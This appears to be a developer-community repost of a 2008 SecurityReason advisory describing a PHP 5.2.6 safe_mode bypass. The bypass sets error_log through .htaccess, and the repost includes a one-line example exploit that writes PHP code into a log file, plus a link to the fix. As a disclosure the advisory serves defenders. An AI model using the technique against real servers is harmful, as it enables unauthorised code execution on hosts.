开发者社区> cnbird> 正文

PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability

2009-02-22 1135

简介:  [ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]Author: Maksymilian Arciemowicz (cXIb8O3)securityreason.
+关注继续查看

 [ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008

SecurityReason Research
SecurityAlert Id: 57

CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl 
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web 
developers to write dynamically generated pages quickly.

error_log

They allow you to define your own error handling rules, as well as modify the way the errors can 
be logged. This allows you to change and enhance error reporting to suit your needs.

- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode

php.ini­:
safe_mode = On

and declaring via php_admin_flag

<Directory "/www">
...
  php_admin_flag safe_mode On
</Directory>

When we create some php script in /www/ and try call to:

ini_set("error_log", "/hack/");

or in /www/.htaccess

php_value error_log "/hack/bleh.php"


Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4


It was for safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On 

in httpd.conf, we will get only

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

syntax in .htaccess

php_value error_log "/hack/blehx.php"

is allowed and bypass safe_mode.

example exploit:
error_log("<?php phpinfo(); ?>", 0);

- --- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not use safe_mode as a main safety.

 --- 3. Greets ---
sp3x Infospec schain p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

PHP
PHP log
开发者社区 > 开发与运维 > 文章
云迁移中心
作者高分内容
更多
Microsoft BuleHat 2018 Videos and Slides 1752 From Serialized to Shell :: Auditing Google Web Toolkit 1399 Microsoft Ignite Videos 1430 AWS Reinvent 2017 Security Sessions 1459 Google Patent 2591
相关文章
清雨小竹
PHP写Log日志
PHP写Log日志
18 0
咖啡机(K.F.J)
PHP Log时时查看小工具
以前Log都是打印在一个文档中,然后打开文件夹,最后打开文档查看里面的内容,每次打开文件夹感觉很烦。 前些日子看到同事开发.NET的时候,用他自己的一个小工具能够时时查看到Log的内容,非常方便,所以就想移植到PHP开发中。
109 0
技术小胖子
PHP Log时时查看小工具
960 0
suboysugar
快速php日志,写内容到文件,把日志写到log文件
php 写内容到文件,把日志写到log文件 //记录日志:要写入文件的文件名(可以是任意文件名),如果文件不存在,将会创建一个.log.txt位置在项目的根目录下。 $file = 'log.
1920 0
suboysugar
PHP性能调优,PHP慢日志---善用php-fpm的慢执行日志slow log,分析php性能问题
众所周知,MySQL有slow query log,根据慢查询日志,我们可以知道那些sql语句有性能问题。作为mysql的好搭档,php也有这样的功能。如果你使用php-fpm来管理php的话,你可以通过如下选项开启。
1580 0
源码下载
PHP原生态记录Log函数
1、因为项目已经上线了,所以调试起来就不可能把报错直接输出来,写了一个简单的日志函数如下: //$log要添加的字符串、$filePrefix 日志名$fileSuffix 日志后缀$tim...
777 0
exinnet
善用php-fpm的慢执行日志slow log,分析php性能问题
7177 0
沃和莱特
基于PHP和MySQL的新闻发布系统——【功能优化】
基于PHP和MySQL的新闻发布系统——【功能优化】
33658 0
沃和莱特
基于PHP和MySQL的新闻发布系统
基于PHP和MySQL的新闻发布系统
40 0
微笑的段嘉许
开心档-软件开发入门之PHP - AJAX 与 MySQL
本文主要讲解AJAX 可用来与数据库进行交互式通信。
35 0
+关注
cnbird
阿里云安全专家,主要负责阿里云云产品安全。
文章
问答
作者高分内容
更多
Microsoft BuleHat 2018 Videos and Slides 1752 From Serialized to Shell :: Auditing Google Web Toolkit 1399 Microsoft Ignite Videos 1430 AWS Reinvent 2017 Security Sessions 1459 Google Patent 2591
文章排行榜
最热
最新
1 C生万物 | 函数的讲解与剖析【内附众多案例详解】 116247
2 ArcMap矢量图层的零碎、空洞区域填补与独立区域剔除:消除面部件 111534
3 身临其境!带你“走”一遍物联网真实案例实验场景 69489
4 【Kafka从成神到升仙系列 五】面试官问我 Kafka 生产者的网络架构,我直接开始从源码背起....... 68215
5 Spark+Celeborn:更快,更稳,更弹性 66626
6 带你用Python浪漫情人节(附源码) 64538
7 Meetup 报名丨 共话云原生架构升级,微服务x容器开源 Meetup 北京站来啦! 64323
8 CVPR2021 | 视觉推理解释框架VRX:用结构化视觉概念作为解释网络推理逻辑的「语言」 63296
9 结构化总结与结构化思考之《金字塔原理》总结 56077
10 实现人机协同高稳定性,阿里云5G专网IoT方案入选工信部优秀解决方案 53912
11 重构的核心-让代码保持整洁 40127
12 【Linux】-- 开发工具yum、vim、gcc、g++、gdb、make、makefile使用介绍(一) 39703
13 【Linux】Linux的常见指令详解(下) 38154
14 【C++修炼之路】类和对象(中)—— 筑基篇 37083
15 一个大四学长分享自己的web前端学习路线--vue篇(1/3) 36098
16 Hive数据倾斜的原因以及常用解决方案 32991
17 阿里云医疗数据安全与隐私计算 32906
18 高并发编程之阻塞队列 32527
19 Spring 事务【隔离级别与传播机制】 30237
20 性能优化之使用vue-worker插件(基于Web Worker)开启多线程运算提高效率 29298
1 云效codeup 75
2 ChatGPT4高分通过数据库系统工程师(DBA)认证 72
3 脚本启动Jar应用 175
4 重构·改善既有代码的设计.04之重构手法(下)完结 86
5 公安人脸实名认证接口说明 238
6 C++基础 53
7 阿里云学生专享免费云服务器 57
8 Linux基础操作 71
9 魔塔社区体验AI开发 68
10 产品动态丨阿里云计算巢月刊-2023年第03期 99
11 阿里云短信服务控制台发送记录查询操作示例 56
12 一文读懂Linux多线程中互斥锁、读写锁、自旋锁、条件变量、信号量 8168
13 TCP 三次握手,给我长脸了噢 6182
14 基于 Apache Flink 的实时计算数据流业务引擎在京东零售的实践和落地 238
15 阿里云服务器、轻量应用服务器与gpu云服务器优惠价格及券后价格参考 52
16 OCR文档自学习初体验 271
17 阿里云Elasticsearch 让搜索上云像使用“水电”一样简单 19440
18 GTC 2023 | 阿里云弹性计算团队专家演讲推荐 67
19 关于Nacos的随意添加用户 150
20 人证比对API接口的场景和优势 207
相关课程
更多
PHP完全自学手册文档教程
9434
88
去学习
PHP进阶教程 - 由浅入深掌握面向对象开发 - 第一阶段
209
32
去学习
PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段
144
33
去学习
PHP进阶教程 - 由浅入深掌握面向对象开发 - 第三阶段
211
31
去学习
推荐文章
参与OCR文档自学习产品评测,赢Airpods 2 参与云效代码管理Codeup评测,赢Redmi Watch 3 参与IoT小程序框架评测,赢CHERRY机械键盘 乘风者计划邀您入驻社区,精彩权益即刻享
相关电子书
更多
PHP安全开发_从白帽角度做安全
立即下载
PHP在机器学习上的应用及云深度学习平台的架构设计与实现
立即下载
PHP与APM_技术内幕和最佳实践
立即下载